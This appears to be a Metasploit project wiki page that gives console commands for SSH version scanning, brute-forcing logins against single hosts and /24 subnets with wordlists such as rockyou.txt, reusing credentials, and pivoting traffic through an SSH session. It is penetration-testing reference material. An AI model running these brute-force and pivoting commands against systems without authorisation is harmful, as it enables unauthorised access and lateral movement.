-
Notifications
You must be signed in to change notification settings - Fork 13.9k
Metasploit Guide SSH
adfoster-r7 edited this page Apr 21, 2022
·
6 revisions
Enumerate SSH version:
use auxiliary/scanner/ssh/ssh_version
run ssh://127.0.0.1
Brute-force host with known user and password list:
use scanner/ssh/ssh_login
run ssh://known_user@192.168.222.1 threads=50 pass_file=./rockyou.txt
Brute-force credentials:
use scanner/ssh/ssh_login
run ssh://192.168.222.1 threads=50 user_file=./users.txt pass_file=./rockyou.txt
Brute-force credentials in a subnet:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
run cidr:/24:ssh://user@192.168.222.0 threads=50 pass_file=./rockyou.txt
If you have valid SSH credentials the ssh_login module will open a Metasploit session for you:
use scanner/ssh/ssh_login
run ssh://user:pass@172.18.102.20
Re-using SSH credentials in a subnet:
use scanner/ssh/ssh_login
run cidr:/24:ssh://user:pass@192.168.222.0 threads=50
Using an alternative port:
use scanner/ssh/ssh_login
run ssh://user:pass@192.168.123.6:2222
Like Meterpreter, it is possible to port forward through a Metasploit SSH session:
route add 172.18.103.0/24 ssh_session_id
To a route for the most recently opened Meterpreter session:
route add 172.18.103.0/24 -1
- Home Welcome to Metasploit!
- Using Metasploit A collection of useful links for penetration testers.
-
Setting Up a Metasploit Development Environment From
apt-get installtogit push. - CONTRIBUTING.md What should your contributions look like?
- Landing Pull Requests Working with other people's contributions.
- Using Git All about Git and GitHub.
- Contributing to Metasploit Be a part of our open source community.
- Meterpreter All about the Meterpreter payload.